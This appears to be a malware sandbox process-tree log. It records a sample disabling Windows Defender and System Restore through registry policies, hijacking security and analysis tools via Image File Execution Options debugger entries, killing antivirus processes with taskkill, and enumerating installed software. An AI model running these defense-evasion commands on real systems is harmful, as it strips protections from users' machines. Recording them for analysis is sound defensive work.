        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1832)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 1740)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
    [2] C:\Windows\System32\reg.exe  (PID 1548)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1900)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 368)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
    [2] C:\Windows\System32\taskkill.exe  (PID 1072)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\System32\reg.exe  (PID 1692)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1080)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 1788)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1612)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 1056)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1516)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 580)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    [2] C:\Windows\System32\reg.exe  (PID 288)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 680)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    [2] C:\Windows\system32\cmd.exe  (PID 1908)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1408)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1548)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    [2] C:\Windows\System32\reg.exe  (PID 1804)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\taskkill.exe  (PID 1328)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\System32\reg.exe  (PID 1828)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 320)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\system32\cmd.exe  (PID 1576)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1900)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1992)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    [2] C:\Windows\System32\reg.exe  (PID 1916)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1836)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\System32\reg.exe  (PID 1628)
        cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    [2] C:\Windows\system32\cmd.exe  (PID 1860)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 2044)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1892)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    [2] C:\Windows\System32\taskkill.exe  (PID 1868)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\system32\cmd.exe  (PID 1824)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1212)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1896)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1356)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1988)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1560)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1520)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1796)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1580)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1340)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1524)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1916)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    [2] C:\Windows\System32\taskkill.exe  (PID 320)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\system32\cmd.exe  (PID 1344)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1068)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1836)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1932)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1892)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1624)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1884)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1468)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 688)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 2036)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1560)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1592)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1804)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1808)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1524)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    [2] C:\Windows\System32\taskkill.exe  (PID 1916)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\system32\cmd.exe  (PID 1040)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1544)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 580)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1400)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 660)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 828)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1868)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1820)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1168)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1636)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 328)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 648)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1836)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1340)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1956)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    [2] C:\Windows\System32\taskkill.exe  (PID 1632)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\system32\cmd.exe  (PID 1936)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 240)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1840)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1992)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1424)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1184)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1064)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1592)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1952)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1488)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1056)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 660)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1472)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1168)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1980)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    [2] C:\Windows\System32\taskkill.exe  (PID 1136)
        cmdline: "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
        - Kills process with taskkill
    [2] C:\Windows\system32\cmd.exe  (PID 1260)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1788)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1520)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1672)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 2044)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1840)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1624)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 688)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1532)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1852)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 2020)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
        [3] C:\Windows\system32\reg.exe  (PID 1816)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    [2] C:\Windows\system32\cmd.exe  (PID 1632)
        cmdline: cmd.exe
        [3] C:\Windows\system32\reg.exe  (PID 1256)
            cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1844
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1492
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1408
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1972
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:1048
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1788
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1908
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:624
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:328
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1356
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1488
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1424
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1992
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1816
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1524
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1616
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1984
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:324
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1088
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:528
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1068
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:820
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:288
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:240
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1956
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1960
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1472
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1040
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:744
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1328
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1256
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
